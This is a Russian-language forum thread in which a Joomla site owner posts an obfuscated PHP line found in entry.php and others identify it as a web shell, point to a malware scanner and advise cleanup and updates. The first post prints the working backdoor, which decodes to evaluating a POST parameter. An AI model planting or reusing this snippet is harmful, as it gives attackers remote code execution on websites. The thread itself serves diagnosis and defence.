0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 1267 Просмотров
*

aslanamirov

  • Захожу иногда
  • 87
  • 4 / 0
  • Ййехаа!
Код
$xlt7 ="utspeo_r" ; $cjk22 = $xlt7[2]. $xlt7[1].$xlt7[7].$xlt7[1]. $xlt7[5].$xlt7[0]. $xlt7[3].$xlt7[3]. $xlt7[4]. $xlt7[7]; $zgyh5 =$cjk22 ($xlt7[6]. $xlt7[3]. $xlt7[5].$xlt7[2].$xlt7[1] );if(isset ( ${ $zgyh5 }[ 'q493de8' ] )){ eval (${$zgyh5 } [ 'q493de8' ] ) ;}?> <?php

Сей код выдал ошибку что то про сессии, забыл заскринить. Код был вставлен в 1 строку с кучей пробелов после <?php

Что это? и откуда могло вылезти?

UPD: админку скрыл нужными плагинами. Joomla 3.5.0
« Последнее редактирование: 21.04.2016, 02:38:10 от aslanamirov »
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Какой то код прописался в entry.php?
« Ответ #1 : 21.04.2016, 07:29:59 »
 откуда Joomla ? Проверять сайт на вирусы, шелл
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
*

aslanamirov

  • Захожу иногда
  • 87
  • 4 / 0
  • Ййехаа!
Re: Какой то код прописался в entry.php?
« Ответ #3 : 21.04.2016, 10:35:18 »
откуда Joomla ? Проверять сайт на вирусы, шелл

А не подскажете чем лучше проверять сайт?
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Какой то код прописался в entry.php?
« Ответ #5 : 21.04.2016, 11:08:31 »
По моему айболит на этот скрипт не реагирует.Рандомно меняются имя переменный и значения.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Какой то код прописался в entry.php?
« Ответ #6 : 21.04.2016, 11:17:57 »
По моему айболит на этот скрипт не реагирует.Рандомно меняются имя переменный и значения.
Отреагирует там { eval присутствует не полностью обфусцировано, любой сканер покажет что файл надо проверить.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Какой то код прописался в entry.php?
« Ответ #7 : 21.04.2016, 20:31:41 »
По моему айболит на этот скрипт не реагирует.Рандомно меняются имя переменный и значения.
Реагирует!, в нем заложена эвристика подобных бегдоров, в которых принцип не в переменных, а в конструкции кода...
*

aslanamirov

  • Захожу иногда
  • 87
  • 4 / 0
  • Ййехаа!
Re: Какой то код прописался в entry.php?
« Ответ #8 : 23.04.2016, 13:51:59 »
https://www.revisium.com/ai/

Блин, прогнал айболита нашел 43 шелла :(
Кто может что подсказать каким образом эти гады лезут на сайт?
Обновил Joomla до 3.5.1 - поможет?
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Какой то код прописался в entry.php?
« Ответ #9 : 23.04.2016, 15:38:44 »
Поздно уже. Кроме обновления надо вычистить все вредоносные коды и сменить пароли. На локалке желательно.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Какой то код прописался в entry.php?
« Ответ #10 : 23.04.2016, 15:53:55 »
Заливают их через уязвимости движка и расширений, своевременное обновление помогает только до их появления, а раз уж они уже на сайте, то теперь надо выполнить чистку и потом уже обновлять все. В дальнейшем следить.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1075
Последний ответ 03.11.2020, 17:36:03
от Cedars
И всё-таки какой CHMOD выставлять?

Автор fedya

Ответов: 34
Просмотров: 52578
Последний ответ 09.03.2017, 09:32:07
от SeBun
К URL приписывается какой то x.vindicosuite.com/click/fbfpc=1;v=

Автор zzzan

Ответов: 11
Просмотров: 1803
Последний ответ 08.04.2015, 21:39:22
от vipiusss
Вчерась заразился какой-то кАкой "statcounter.345.pl"

Автор flat4er

Ответов: 14
Просмотров: 3522
Последний ответ 26.02.2012, 13:02:49
от flyingspook
Внутри каждой страницы сайта есть чужеродный код. Как отследить на какой IP обращается сайт для полу

Автор Roman_G

Ответов: 13
Просмотров: 4700
Последний ответ 24.09.2010, 15:30:36
от tbhost